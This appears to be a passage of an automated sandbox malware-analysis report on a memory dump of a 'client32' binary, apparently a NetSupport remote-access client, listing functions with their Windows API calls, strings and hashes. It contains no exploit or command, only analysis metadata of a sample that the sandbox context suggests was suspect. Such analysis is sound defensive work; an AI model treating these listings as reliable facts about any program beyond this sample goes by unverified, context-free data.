Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5

Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32(?), ref: 1100306D
GetStockObject.GDI32(00000007), ref: 11003089
SelectObject.GDI32(?,00000000), ref: 1100309A
SelectObject.GDI32(?,?), ref: 110030A7
InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
GetSysColor.USER32(00000004), ref: 110030EB
SetBkColor.GDI32(?,00000000), ref: 110030F6
Rectangle.GDI32(?,?,?,?,?), ref: 11003110
SelectObject.GDI32(?,?), ref: 1100311E
SelectObject.GDI32(?,?), ref: 11003128
DeleteObject.GDI32(?), ref: 1100312E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
String ID:
API String ID: 4121194973-0
Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0

Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON

Download Yara Rule

APIs

CountClipboardFormats.USER32 ref: 11033091

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

EnumClipboardFormats.USER32(00000000), ref: 110330F6
GetLastError.KERNEL32 ref: 110331BF
GetLastError.KERNEL32(00000000), ref: 110331C2
IsClipboardFormatAvailable.USER32(00000008), ref: 11033225

Strings

ppFormats, xrefs: 11033080
..\ctl32\clipbrd.cpp, xrefs: 1103307B
Error enumclip, e=%d, x%x, xrefs: 110331C5

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
API String ID: 3210887762-597690070
Opcode ID: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
Opcode Fuzzy Hash: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90

Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110513F9
CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

Strings

_profileSection, xrefs: 110513CA
PolicyChanged, invalid user, disconnect, xrefs: 1105147C
PolicyChanged, disconnect, xrefs: 11051532
Client, xrefs: 110513CF, 11051496, 110514B2
PolicyChanged, userack needed, disconnect, xrefs: 110514C0
10.21.0.0, xrefs: 11051396
UserAcknowledge, xrefs: 11051491, 110514AD

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle__wcstoi64_memset
String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
API String ID: 510078033-311296318
Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51

Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
MessageBeep.USER32(00000000), ref: 1113F1C9
InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
UpdateWindow.USER32(?), ref: 1113F21B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113F0F4, 1113F1DA, 1113F205
NSMStatsWindow::OnTimer, xrefs: 1113F11C
NSMStatsWindow Read %d and %d (previous %d), xrefs: 1113F153
m_hWnd, xrefs: 1113F0F9, 1113F1DF, 1113F20A
NSMStatsWindow Add value %d, xrefs: 1113F199

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 490496107-2775872530
Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52

Function 11147090 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

LoadLibraryA.KERNEL32(secur32.dll,0BAD89F8,?,?,?), ref: 111470D1
GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
timeGetTime.WINMM(?,?), ref: 111470FC
timeGetTime.WINMM(?,?), ref: 11147113
GetLastError.KERNEL32(?,?), ref: 11147119
FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B

Strings

GetUserNameEx ret %d, %s, time=%d ms, e=%d, xrefs: 11147126
secur32.dll, xrefs: 111470CC
GetUserNameExA, xrefs: 111470DC

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
API String ID: 2282859717-3523682560
Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1

Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110351E0

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 11035267
_memmove.LIBCMT ref: 1103528B
_memmove.LIBCMT ref: 110352C5
_memmove.LIBCMT ref: 110352E1
std::exception::exception.LIBCMT ref: 1103532B
__CxxThrowException@8.LIBCMT ref: 11035340

Strings

deque<T> too long, xrefs: 110351DB

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
Opcode Fuzzy Hash: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790

Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019370

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 110193F7
_memmove.LIBCMT ref: 1101941B
_memmove.LIBCMT ref: 11019455
_memmove.LIBCMT ref: 11019471
std::exception::exception.LIBCMT ref: 110194BB
__CxxThrowException@8.LIBCMT ref: 110194D0

Strings

deque<T> too long, xrefs: 1101936B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
Opcode Fuzzy Hash: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790

Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 11025351

Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF

SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433

Strings

8, xrefs: 110253A9

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
String ID: 8
API String ID: 762489935-4194326291
Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69

Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000032), ref: 110270E9
GetTickCount.KERNEL32 ref: 110270F7
GetTickCount.KERNEL32 ref: 11027107

Strings

IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
HandleIPC ret %x, took %d ms, xrefs: 11027110
Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
API String ID: 4250438611-314227603
Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2

Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2

Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078

SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
GetDlgItem.USER32(?,?), ref: 11023414
SetFocus.USER32(00000000), ref: 11023417
GetDlgItem.USER32(00000000,?), ref: 11023445
EnableWindow.USER32(00000000,00000000), ref: 1102344A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11023433
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1102342E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1605826578-1986719024
